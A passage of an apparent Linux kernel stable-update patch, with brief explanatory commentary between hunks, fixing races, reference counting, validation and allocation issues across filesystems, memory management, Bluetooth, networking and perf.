+ 		de = (struct nilfs_dir_entry *)kaddr;
+ 		kaddr += nilfs_last_byte(inode, i) - NILFS_DIR_REC_LEN(1);
+ 
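
The nilfs2 refactor above makes nilfs_get_page() return the kmap()ed address (or an ERR_PTR) and hand the page back through an out-parameter, so callers test a single value instead of checking the page and then separately calling page_address(). A hedged sketch of the resulting calling convention, with illustrative names:

    /* Returns the mapped address on success or ERR_PTR(-E...) on failure;
     * *pagep is only valid when the return value is not an error.
     */
    void *get_dir_page(struct inode *dir, unsigned long n, struct page **pagep);

    /* Caller checks the returned address, not the page: */
    kaddr = get_dir_page(dir, n, &page);
    if (IS_ERR(kaddr))
        return PTR_ERR(kaddr);
    /* ... use kaddr, then kunmap(page) and put_page(page) when done ... */
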
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index dfc459a62fb30..04943ab40a011 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1692,6 +1692,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 			if (bh->b_page != bd_page) {
+ 				if (bd_page) {
+ 					lock_page(bd_page);
++					wait_on_page_writeback(bd_page);
+ 					clear_page_dirty_for_io(bd_page);
+ 					set_page_writeback(bd_page);
+ 					unlock_page(bd_page);
+@@ -1705,6 +1706,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 			if (bh == segbuf->sb_super_root) {
+ 				if (bh->b_page != bd_page) {
+ 					lock_page(bd_page);
++					wait_on_page_writeback(bd_page);
+ 					clear_page_dirty_for_io(bd_page);
+ 					set_page_writeback(bd_page);
+ 					unlock_page(bd_page);
+@@ -1721,6 +1723,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 	}
+ 	if (bd_page) {
+ 		lock_page(bd_page);
++		wait_on_page_writeback(bd_page);
+ 		clear_page_dirty_for_io(bd_page);
+ 		set_page_writeback(bd_page);
+ 		unlock_page(bd_page);
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index cae410568bb2e..f502bb2ce2ea7 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -1937,6 +1937,8 @@ static int __ocfs2_change_file_space(struct file *file, struct inode *inode,
+ 
+ 	inode_lock(inode);
+ 
++	/* Wait all existing dio workers, newcomers will block on i_rwsem */
++	inode_dio_wait(inode);
+ 	/*
+ 	 * This prevents concurrent writes on other nodes
+ 	 */
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 04a8505bd97af..8a0fa51c9ac68 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -566,7 +566,7 @@ static int __ocfs2_mknod_locked(struct inode *dir,
+ 	fe->i_last_eb_blk = 0;
+ 	strcpy(fe->i_signature, OCFS2_INODE_SIGNATURE);
+ 	fe->i_flags |= cpu_to_le32(OCFS2_VALID_FL);
+-	ktime_get_real_ts64(&ts);
++	ktime_get_coarse_real_ts64(&ts);
+ 	fe->i_atime = fe->i_ctime = fe->i_mtime =
+ 		cpu_to_le64(ts.tv_sec);
+ 	fe->i_mtime_nsec = fe->i_ctime_nsec = fe->i_atime_nsec =
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index 1ec0647a20268..f4d5db3597187 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -383,6 +383,8 @@ static ssize_t __read_vmcore(struct iov_iter *iter, loff_t *fpos)
+ 		/* leave now if filled buffer already */
+ 		if (!iov_iter_count(iter))
+ 			return acc;
++
++		cond_resched();
+ 	}
+ 
+ 	list_for_each_entry(m, &vmcore_list, list) {
+diff --git a/include/linux/i2c.h b/include/linux/i2c.h
+index f7c49bbdb8a18..cfc59c3371cb2 100644
+--- a/include/linux/i2c.h
++++ b/include/linux/i2c.h
+@@ -964,15 +964,33 @@ int i2c_handle_smbus_host_notify(struct i2c_adapter *adap, unsigned short addr);
+ 
+ #endif /* I2C */
+ 
++/* must call put_device() when done with returned i2c_client device */
++struct i2c_client *i2c_find_device_by_fwnode(struct fwnode_handle *fwnode);
++
++/* must call put_device() when done with returned i2c_adapter device */
++struct i2c_adapter *i2c_find_adapter_by_fwnode(struct fwnode_handle *fwnode);
++
++/* must call i2c_put_adapter() when done with returned i2c_adapter device */
++struct i2c_adapter *i2c_get_adapter_by_fwnode(struct fwnode_handle *fwnode);
++
+ #if IS_ENABLED(CONFIG_OF)
+ /* must call put_device() when done with returned i2c_client device */
+-struct i2c_client *of_find_i2c_device_by_node(struct device_node *node);
++static inline struct i2c_client *of_find_i2c_device_by_node(struct device_node *node)
++{
++	return i2c_find_device_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ /* must call put_device() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node);
++static inline struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node)
++{
++	return i2c_find_adapter_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ /* must call i2c_put_adapter() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node);
++static inline struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node)
++{
++	return i2c_get_adapter_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ const struct of_device_id
+ *i2c_of_match_device(const struct of_device_id *matches,
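
With this change the OF helpers above become thin inline wrappers, so device tree lookups and other firmware node types (ACPI, for instance) funnel through one fwnode-based implementation. A hedged usage sketch; np stands in for some struct device_node pointer:

    struct i2c_adapter *adap;

    adap = of_get_i2c_adapter_by_node(np);  /* DT spelling ...              */
    /* ... now equivalent to:
     * adap = i2c_get_adapter_by_fwnode(of_fwnode_handle(np));
     */
    if (adap) {
        /* ... use the adapter ... */
        i2c_put_adapter(adap);              /* drop the reference when done */
    }
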
+diff --git a/include/linux/pse-pd/pse.h b/include/linux/pse-pd/pse.h
+index fb724c65c77bc..5ce0cd76956e0 100644
+--- a/include/linux/pse-pd/pse.h
++++ b/include/linux/pse-pd/pse.h
+@@ -114,14 +114,14 @@ static inline int pse_ethtool_get_status(struct pse_control *psec,
+ 					 struct netlink_ext_ack *extack,
+ 					 struct pse_control_status *status)
+ {
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ static inline int pse_ethtool_set_config(struct pse_control *psec,
+ 					 struct netlink_ext_ack *extack,
+ 					 const struct pse_control_config *config)
+ {
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ #endif
+diff --git a/include/linux/serial_core.h b/include/linux/serial_core.h
+index 13bf20242b61a..1c9b3f27f2d36 100644
+--- a/include/linux/serial_core.h
++++ b/include/linux/serial_core.h
+@@ -467,6 +467,7 @@ struct uart_port {
+ 	unsigned char		iotype;			/* io access style */
+ 	unsigned char		quirks;			/* internal quirks */
+ 
++#define UPIO_UNKNOWN		((unsigned char)~0U)	/* UCHAR_MAX */
+ #define UPIO_PORT		(SERIAL_IO_PORT)	/* 8b I/O port access */
+ #define UPIO_HUB6		(SERIAL_IO_HUB6)	/* Hub6 ISA card */
+ #define UPIO_MEM		(SERIAL_IO_MEM)		/* driver-specific */
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index c50a41f1782a4..9df7e29386bcc 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -1936,18 +1936,46 @@ static inline int hci_check_conn_params(u16 min, u16 max, u16 latency,
+ {
+ 	u16 max_latency;
+ 
+-	if (min > max || min < 6 || max > 3200)
++	if (min > max) {
++		BT_WARN("min %d > max %d", min, max);
+ 		return -EINVAL;
++	}
++
++	if (min < 6) {
++		BT_WARN("min %d < 6", min);
++		return -EINVAL;
++	}
++
++	if (max > 3200) {
++		BT_WARN("max %d > 3200", max);
++		return -EINVAL;
++	}
++
++	if (to_multiplier < 10) {
++		BT_WARN("to_multiplier %d < 10", to_multiplier);
++		return -EINVAL;
++	}
+ 
+-	if (to_multiplier < 10 || to_multiplier > 3200)
++	if (to_multiplier > 3200) {
++		BT_WARN("to_multiplier %d > 3200", to_multiplier);
+ 		return -EINVAL;
++	}
+ 
+-	if (max >= to_multiplier * 8)
++	if (max >= to_multiplier * 8) {
++		BT_WARN("max %d >= to_multiplier %d * 8", max, to_multiplier);
+ 		return -EINVAL;
++	}
+ 
+ 	max_latency = (to_multiplier * 4 / max) - 1;
+-	if (latency > 499 || latency > max_latency)
++	if (latency > 499) {
++		BT_WARN("latency %d > 499", latency);
+ 		return -EINVAL;
++	}
++
++	if (latency > max_latency) {
++		BT_WARN("latency %d > max_latency %d", latency, max_latency);
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
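
For context, the checks above follow the usual BLE units: min and max are connection intervals in 1.25 ms steps (6..3200), to_multiplier is the supervision timeout in 10 ms steps, and max_latency is consistent with requiring the timeout to cover at least twice (1 + latency) intervals. A worked example under those assumed units:

    max = 40            -> interval            = 40 * 1.25 ms = 50 ms
    to_multiplier = 100 -> supervision timeout = 100 * 10 ms  = 1 s
    max >= to_multiplier * 8 ?  40 >= 800 is false -> passes
    max_latency = (100 * 4 / 40) - 1 = 9
    latency = 10 -> rejected, now logging "latency 10 > max_latency 9"
                    rather than returning a bare -EINVAL
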
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index f9906b73e7ff4..0cc077c3dda30 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -353,9 +353,10 @@ static inline bool pskb_inet_may_pull(struct sk_buff *skb)
+ 
+ /* Variant of pskb_inet_may_pull().
+  */
+-static inline bool skb_vlan_inet_prepare(struct sk_buff *skb)
++static inline bool skb_vlan_inet_prepare(struct sk_buff *skb,
++					 bool inner_proto_inherit)
+ {
+-	int nhlen = 0, maclen = ETH_HLEN;
++	int nhlen = 0, maclen = inner_proto_inherit ? 0 : ETH_HLEN;
+ 	__be16 type = skb->protocol;
+ 
+ 	/* Essentially this is skb_protocol(skb, true)
+diff --git a/include/scsi/scsi_transport_sas.h b/include/scsi/scsi_transport_sas.h
+index 0e75b9277c8c6..e3b6ce3cbf883 100644
+--- a/include/scsi/scsi_transport_sas.h
++++ b/include/scsi/scsi_transport_sas.h
+@@ -200,6 +200,8 @@ unsigned int sas_is_tlr_enabled(struct scsi_device *);
+ void sas_disable_tlr(struct scsi_device *);
+ void sas_enable_tlr(struct scsi_device *);
+ 
++bool sas_ata_ncq_prio_supported(struct scsi_device *sdev);
++
+ extern struct sas_rphy *sas_end_device_alloc(struct sas_port *);
+ extern struct sas_rphy *sas_expander_alloc(struct sas_port *, enum sas_device_type);
+ void sas_rphy_free(struct sas_rphy *);
+diff --git a/include/trace/events/cachefiles.h b/include/trace/events/cachefiles.h
+index d8d4d73fe7b6a..dff9a48502247 100644
+--- a/include/trace/events/cachefiles.h
++++ b/include/trace/events/cachefiles.h
+@@ -33,6 +33,8 @@ enum cachefiles_obj_ref_trace {
+ 	cachefiles_obj_see_withdrawal,
+ 	cachefiles_obj_get_ondemand_fd,
+ 	cachefiles_obj_put_ondemand_fd,
++	cachefiles_obj_get_read_req,
++	cachefiles_obj_put_read_req,
+ };
+ 
+ enum fscache_why_object_killed {
+@@ -127,7 +129,11 @@ enum cachefiles_error_trace {
+ 	EM(cachefiles_obj_see_lookup_cookie,	"SEE lookup_cookie")	\
+ 	EM(cachefiles_obj_see_lookup_failed,	"SEE lookup_failed")	\
+ 	EM(cachefiles_obj_see_withdraw_cookie,	"SEE withdraw_cookie")	\
+-	E_(cachefiles_obj_see_withdrawal,	"SEE withdrawal")
++	EM(cachefiles_obj_see_withdrawal,	"SEE withdrawal")	\
++	EM(cachefiles_obj_get_ondemand_fd,      "GET ondemand_fd")	\
++	EM(cachefiles_obj_put_ondemand_fd,      "PUT ondemand_fd")	\
++	EM(cachefiles_obj_get_read_req,		"GET read_req")		\
++	E_(cachefiles_obj_put_read_req,		"PUT read_req")
+ 
+ #define cachefiles_coherency_traces					\
+ 	EM(cachefiles_coherency_check_aux,	"BAD aux ")		\
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 57ef6850c6a87..55902303d7dc5 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -154,7 +154,8 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
+ 	req->buf_list = bl;
+ 	req->buf_index = buf->bid;
+ 
+-	if (issue_flags & IO_URING_F_UNLOCKED || !file_can_poll(req->file)) {
++	if (issue_flags & IO_URING_F_UNLOCKED ||
++	    (req->file && !file_can_poll(req->file))) {
+ 		/*
+ 		 * If we came in unlocked, we have no choice but to consume the
+ 		 * buffer here, otherwise nothing ensures that the buffer won't
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 872d149b1959b..413a69aecf5c7 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -5182,6 +5182,7 @@ int perf_event_release_kernel(struct perf_event *event)
+ again:
+ 	mutex_lock(&event->child_mutex);
+ 	list_for_each_entry(child, &event->child_list, child_list) {
++		void *var = NULL;
+ 
+ 		/*
+ 		 * Cannot change, child events are not migrated, see the
+@@ -5222,11 +5223,23 @@ int perf_event_release_kernel(struct perf_event *event)
+ 			 * this can't be the last reference.
+ 			 */
+ 			put_event(event);
++		} else {
++			var = &ctx->refcount;
+ 		}
+ 
+ 		mutex_unlock(&event->child_mutex);
+ 		mutex_unlock(&ctx->mutex);
+ 		put_ctx(ctx);
++
++		if (var) {
++			/*
++			 * If perf_event_free_task() has deleted all events from the
++			 * ctx while the child_mutex got released above, make sure to
++			 * notify about the preceding put_ctx().
++			 */
++			smp_mb(); /* pairs with wait_var_event() */
++			wake_up_var(var);
++		}
+ 		goto again;
+ 	}
+ 	mutex_unlock(&event->child_mutex);
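
The perf fix above records the address to wake while the locks are still held and issues a full barrier before wake_up_var(), so a task sleeping in wait_var_event() on the ctx refcount cannot miss the final put_ctx(). The generic shape of that pattern, sketched with a hypothetical done flag:

    /* Waker: the full barrier orders the state change before the
     * waitqueue check hidden inside wake_up_var().
     */
    WRITE_ONCE(obj->done, 1);
    smp_mb();                 /* pairs with the condition check below */
    wake_up_var(&obj->done);

    /* Sleeper: re-checks the condition after queueing itself, which is
     * exactly what the barrier above synchronizes against.
     */
    wait_var_event(&obj->done, READ_ONCE(obj->done));
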
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 7e9a5919299b4..85617928041cf 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -662,15 +662,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		} else if (anon_vma_fork(tmp, mpnt))
+ 			goto fail_nomem_anon_vma_fork;
+ 		tmp->vm_flags &= ~(VM_LOCKED | VM_LOCKONFAULT);
+-		/*
+-		 * Copy/update hugetlb private vma information.
+-		 */
+-		if (is_vm_hugetlb_page(tmp))
+-			hugetlb_dup_vma_private(tmp);
+-
+-		if (tmp->vm_ops && tmp->vm_ops->open)
+-			tmp->vm_ops->open(tmp);
+-
+ 		file = tmp->vm_file;
+ 		if (file) {
+ 			struct address_space *mapping = file->f_mapping;
+@@ -687,6 +678,12 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 			i_mmap_unlock_write(mapping);
+ 		}
+ 
++		/*
++		 * Copy/update hugetlb private vma information.
++		 */
++		if (is_vm_hugetlb_page(tmp))
++			hugetlb_dup_vma_private(tmp);
++
+ 		/* Link the vma into the MT */
+ 		mas.index = tmp->vm_start;
+ 		mas.last = tmp->vm_end - 1;
+@@ -698,6 +695,9 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		if (!(tmp->vm_flags & VM_WIPEONFORK))
+ 			retval = copy_page_range(tmp, mpnt);
+ 
++		if (tmp->vm_ops && tmp->vm_ops->open)
++			tmp->vm_ops->open(tmp);
++
+ 		if (retval)
+ 			goto loop_out;
+ 	}
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index fc21c5d5fd5de..1daadbefcee3a 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -214,6 +214,7 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 	 */
+ 	do {
+ 		clear_thread_flag(TIF_SIGPENDING);
++		clear_thread_flag(TIF_NOTIFY_SIGNAL);
+ 		rc = kernel_wait4(-1, NULL, __WALL, NULL);
+ 	} while (rc != -ECHILD);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index e9138cd7a0f52..7f2b17fc8ce40 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -179,26 +179,6 @@ void tick_setup_periodic(struct clock_event_device *dev, int broadcast)
+ 	}
+ }
+ 
+-#ifdef CONFIG_NO_HZ_FULL
+-static void giveup_do_timer(void *info)
+-{
+-	int cpu = *(unsigned int *)info;
+-
+-	WARN_ON(tick_do_timer_cpu != smp_processor_id());
+-
+-	tick_do_timer_cpu = cpu;
+-}
+-
+-static void tick_take_do_timer_from_boot(void)
+-{
+-	int cpu = smp_processor_id();
+-	int from = tick_do_timer_boot_cpu;
+-
+-	if (from >= 0 && from != cpu)
+-		smp_call_function_single(from, giveup_do_timer, &cpu, 1);
+-}
+-#endif
+-
+ /*
+  * Setup the tick device
+  */
+@@ -222,19 +202,25 @@ static void tick_setup_device(struct tick_device *td,
+ 			tick_next_period = ktime_get();
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+-			 * The boot CPU may be nohz_full, in which case set
+-			 * tick_do_timer_boot_cpu so the first housekeeping
+-			 * secondary that comes up will take do_timer from
+-			 * us.
++			 * The boot CPU may be nohz_full, in which case the
++			 * first housekeeping secondary will take do_timer()
++			 * from it.
+ 			 */
+ 			if (tick_nohz_full_cpu(cpu))
+ 				tick_do_timer_boot_cpu = cpu;
+ 
+-		} else if (tick_do_timer_boot_cpu != -1 &&
+-						!tick_nohz_full_cpu(cpu)) {
+-			tick_take_do_timer_from_boot();
++		} else if (tick_do_timer_boot_cpu != -1 && !tick_nohz_full_cpu(cpu)) {
+ 			tick_do_timer_boot_cpu = -1;
+-			WARN_ON(tick_do_timer_cpu != cpu);
++			/*
++			 * The boot CPU will stay in periodic (NOHZ disabled)
++			 * mode until clocksource_done_booting() called after
++			 * smp_init() selects a high resolution clocksource and
++			 * timekeeping_notify() kicks the NOHZ stuff alive.
++			 *
++			 * So this WRITE_ONCE can only race with the READ_ONCE
++			 * check in tick_periodic() but this race is harmless.
++			 */
++			WRITE_ONCE(tick_do_timer_cpu, cpu);
+ #endif
+ 		}
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index be58ce9992595..8067c1e22af9b 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1110,7 +1110,7 @@ static int me_huge_page(struct page_state *ps, struct page *p)
+ 		 * subpages.
+ 		 */
+ 		put_page(hpage);
+-		if (__page_handle_poison(p) >= 0) {
++		if (__page_handle_poison(p) > 0) {
+ 			page_ref_inc(p);
+ 			res = MF_RECOVERED;
+ 		} else {
+@@ -1888,7 +1888,7 @@ static int try_memory_failure_hugetlb(unsigned long pfn, int flags, int *hugetlb
+ 	 */
+ 	if (res == 0) {
+ 		unlock_page(head);
+-		if (__page_handle_poison(p) >= 0) {
++		if (__page_handle_poison(p) > 0) {
+ 			page_ref_inc(p);
+ 			res = MF_RECOVERED;
+ 		} else {
+@@ -2346,6 +2346,13 @@ int unpoison_memory(unsigned long pfn)
+ 		goto unlock_mutex;
+ 	}
+ 
++	if (is_huge_zero_page(page)) {
++		unpoison_pr_info("Unpoison: huge zero page is not supported %#lx\n",
++				 pfn, &unpoison_rs);
++		ret = -EOPNOTSUPP;
++		goto unlock_mutex;
++	}
++
+ 	if (!PageHWPoison(p)) {
+ 		unpoison_pr_info("Unpoison: Page was already unpoisoned %#lx\n",
+ 				 pfn, &unpoison_rs);
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index 67a10a04df041..c5e30b52844c8 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2923,6 +2923,8 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 		unsigned int order, unsigned int nr_pages, struct page **pages)
+ {
+ 	unsigned int nr_allocated = 0;
++	gfp_t alloc_gfp = gfp;
++	bool nofail = gfp & __GFP_NOFAIL;
+ 	struct page *page;
+ 	int i;
+ 
+@@ -2933,6 +2935,7 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 	 * more permissive.
+ 	 */
+ 	if (!order) {
++		/* bulk allocator doesn't support nofail req. officially */
+ 		gfp_t bulk_gfp = gfp & ~__GFP_NOFAIL;
+ 
+ 		while (nr_allocated < nr_pages) {
+@@ -2971,20 +2974,34 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 			if (nr != nr_pages_request)
+ 				break;
+ 		}
++	} else if (gfp & __GFP_NOFAIL) {
++		/*
++		 * Higher order nofail allocations are really expensive and
++		 * potentially dangerous (premature OOM, disruptive reclaim
++		 * and compaction etc.).
++		 */
++		alloc_gfp &= ~__GFP_NOFAIL;
+ 	}
+ 
+ 	/* High-order pages or fallback path if "bulk" fails. */
+-
+ 	while (nr_allocated < nr_pages) {
+-		if (fatal_signal_pending(current))
++		if (!nofail && fatal_signal_pending(current))
+ 			break;
+ 
+ 		if (nid == NUMA_NO_NODE)
+-			page = alloc_pages(gfp, order);
++			page = alloc_pages(alloc_gfp, order);
+ 		else
+-			page = alloc_pages_node(nid, gfp, order);
+-		if (unlikely(!page))
+-			break;
++			page = alloc_pages_node(nid, alloc_gfp, order);
++		if (unlikely(!page)) {
++			if (!nofail)
++				break;
++
++			/* fall back to the zero order allocations */
++			alloc_gfp |= __GFP_NOFAIL;
++			order = 0;
++			continue;
++		}
++
+ 		/*
+ 		 * Higher order allocations must be able to be treated as
+ 		 * independent small pages by callers (as they can with
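
Condensed, the new vm_area_alloc_pages() flow strips __GFP_NOFAIL from the high-order attempts (which may legitimately fail) and only restores it after falling back to order-0, which the page allocator can always satisfy eventually. A hedged restatement of just that control flow, not a drop-in implementation:

    gfp_t alloc_gfp = gfp;
    bool nofail = gfp & __GFP_NOFAIL;

    if (order > 0)
        alloc_gfp &= ~__GFP_NOFAIL;         /* high order may fail fast */

    while (nr_allocated < nr_pages) {
        page = alloc_pages_node(nid, alloc_gfp, order);
        if (!page) {
            if (!nofail)
                break;                      /* ordinary failure path */
            alloc_gfp |= __GFP_NOFAIL;      /* retry, but at order-0 */
            order = 0;
            continue;
        }
        /* ... split and record the allocated pages ... */
    }
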
+diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c
+index 0bffac238b615..a1e0be8716870 100644
+--- a/net/ax25/af_ax25.c
++++ b/net/ax25/af_ax25.c
+@@ -1378,8 +1378,10 @@ static int ax25_accept(struct socket *sock, struct socket *newsock, int flags,
+ {
+ 	struct sk_buff *skb;
+ 	struct sock *newsk;
++	ax25_dev *ax25_dev;
+ 	DEFINE_WAIT(wait);
+ 	struct sock *sk;
++	ax25_cb *ax25;
+ 	int err = 0;
+ 
+ 	if (sock->state != SS_UNCONNECTED)
+@@ -1434,6 +1436,10 @@ static int ax25_accept(struct socket *sock, struct socket *newsock, int flags,
+ 	kfree_skb(skb);
+ 	sk_acceptq_removed(sk);
+ 	newsock->state = SS_CONNECTED;
++	ax25 = sk_to_ax25(newsk);
++	ax25_dev = ax25->ax25_dev;
++	netdev_hold(ax25_dev->dev, &ax25->dev_tracker, GFP_ATOMIC);
++	ax25_dev_hold(ax25_dev);
+ 
+ out:
+ 	release_sock(sk);
+diff --git a/net/ax25/ax25_dev.c b/net/ax25/ax25_dev.c
+index fcc64645bbf5e..e165fe108bb00 100644
+--- a/net/ax25/ax25_dev.c
++++ b/net/ax25/ax25_dev.c
+@@ -193,7 +193,7 @@ void __exit ax25_dev_free(void)
+ 	list_for_each_entry_safe(s, n, &ax25_dev_list, list) {
+ 		netdev_put(s->dev, &s->dev_tracker);
+ 		list_del(&s->list);
+-		kfree(s);
++		ax25_dev_put(s);
+ 	}
+ 	spin_unlock_bh(&ax25_dev_lock);
+ }
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 5f9a599baa34d..a204488a21759 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -5641,13 +5641,7 @@ static inline int l2cap_conn_param_update_req(struct l2cap_conn *conn,
+ 
+ 	memset(&rsp, 0, sizeof(rsp));
+ 
+-	if (max > hcon->le_conn_max_interval) {
+-		BT_DBG("requested connection interval exceeds current bounds.");
+-		err = -EINVAL;
+-	} else {
+-		err = hci_check_conn_params(min, max, latency, to_multiplier);
+-	}
+-
++	err = hci_check_conn_params(min, max, latency, to_multiplier);
+ 	if (err)
+ 		rsp.result = cpu_to_le16(L2CAP_CONN_PARAM_REJECTED);
+ 	else
+diff --git a/net/bpf/test_run.c b/net/bpf/test_run.c
+index 6094ef7cffcd2..64be562f0fe32 100644
+--- a/net/bpf/test_run.c
++++ b/net/bpf/test_run.c
+@@ -841,10 +841,16 @@ static void
+ __bpf_prog_test_run_raw_tp(void *data)
+ {
+ 	struct bpf_raw_tp_test_run_info *info = data;
++	struct bpf_trace_run_ctx run_ctx = {};
++	struct bpf_run_ctx *old_run_ctx;
++
++	old_run_ctx = bpf_set_run_ctx(&run_ctx.run_ctx);
+ 
+ 	rcu_read_lock();
+ 	info->retval = bpf_prog_run(info->prog, info->ctx);
+ 	rcu_read_unlock();
++
++	bpf_reset_run_ctx(old_run_ctx);
+ }
+ 
+ int bpf_prog_test_run_raw_tp(struct bpf_prog *prog,
+diff --git a/net/bridge/br_mst.c b/net/bridge/br_mst.c
+index 3c66141d34d62..1820f09ff59ce 100644
+--- a/net/bridge/br_mst.c
++++ b/net/bridge/br_mst.c
+@@ -73,11 +73,10 @@ int br_mst_get_state(const struct net_device *dev, u16 msti, u8 *state)
+ }
+ EXPORT_SYMBOL_GPL(br_mst_get_state);
+ 
+-static void br_mst_vlan_set_state(struct net_bridge_port *p, struct net_bridge_vlan *v,
++static void br_mst_vlan_set_state(struct net_bridge_vlan_group *vg,
++				  struct net_bridge_vlan *v,
+ 				  u8 state)
+ {
+-	struct net_bridge_vlan_group *vg = nbp_vlan_group(p);
+-
+ 	if (br_vlan_get_state(v) == state)
+ 		return;
+ 
+@@ -103,7 +102,7 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	int err = 0;
+ 
+ 	rcu_read_lock();
+-	vg = nbp_vlan_group(p);
++	vg = nbp_vlan_group_rcu(p);
+ 	if (!vg)
+ 		goto out;
+ 
+@@ -121,7 +120,7 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 		if (v->brvlan->msti != msti)
+ 			continue;
+ 
+-		br_mst_vlan_set_state(p, v, state);
++		br_mst_vlan_set_state(vg, v, state);
+ 	}
+ 
+ out:
+@@ -140,13 +139,13 @@ static void br_mst_vlan_sync_state(struct net_bridge_vlan *pv, u16 msti)
+ 		 * it.
+ 		 */
+ 		if (v != pv && v->brvlan->msti == msti) {
+-			br_mst_vlan_set_state(pv->port, pv, v->state);
++			br_mst_vlan_set_state(vg, pv, v->state);
+ 			return;
+ 		}
+ 	}
+ 
+ 	/* Otherwise, start out in a new MSTI with all ports disabled. */
+-	return br_mst_vlan_set_state(pv->port, pv, BR_STATE_DISABLED);
++	return br_mst_vlan_set_state(vg, pv, BR_STATE_DISABLED);
+ }
+ 
+ int br_mst_vlan_set_msti(struct net_bridge_vlan *mv, u16 msti)
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index aa7ff6a464291..c1fb071eed9b1 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1623,19 +1623,23 @@ void sock_map_close(struct sock *sk, long timeout)
+ 
+ 	lock_sock(sk);
+ 	rcu_read_lock();
+-	psock = sk_psock_get(sk);
+-	if (unlikely(!psock)) {
+-		rcu_read_unlock();
+-		release_sock(sk);
+-		saved_close = READ_ONCE(sk->sk_prot)->close;
+-	} else {
++	psock = sk_psock(sk);
++	if (likely(psock)) {
+ 		saved_close = psock->saved_close;
+ 		sock_map_remove_links(sk, psock);
++		psock = sk_psock_get(sk);
++		if (unlikely(!psock))
++			goto no_psock;
+ 		rcu_read_unlock();
+ 		sk_psock_stop(psock);
+ 		release_sock(sk);
+ 		cancel_delayed_work_sync(&psock->work);
+ 		sk_psock_put(sk, psock);
++	} else {
++		saved_close = READ_ONCE(sk->sk_prot)->close;
++no_psock:
++		rcu_read_unlock();
++		release_sock(sk);
+ 	}
+ 
+ 	/* Make sure we do not recurse. This is a bug.
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 3447a09ee83a2..2d4f697d338f5 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2758,6 +2758,10 @@ void tcp_set_state(struct sock *sk, int state)
+ 		if (oldstate != TCP_ESTABLISHED)
+ 			TCP_INC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
+ 		break;
++	case TCP_CLOSE_WAIT:
++		if (oldstate == TCP_SYN_RECV)
++			TCP_INC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
++		break;
+ 
+ 	case TCP_CLOSE:
+ 		if (oldstate == TCP_CLOSE_WAIT || oldstate == TCP_ESTABLISHED)
+@@ -2769,7 +2773,7 @@ void tcp_set_state(struct sock *sk, int state)
+ 			inet_put_port(sk);
+ 		fallthrough;
+ 	default:
+-		if (oldstate == TCP_ESTABLISHED)
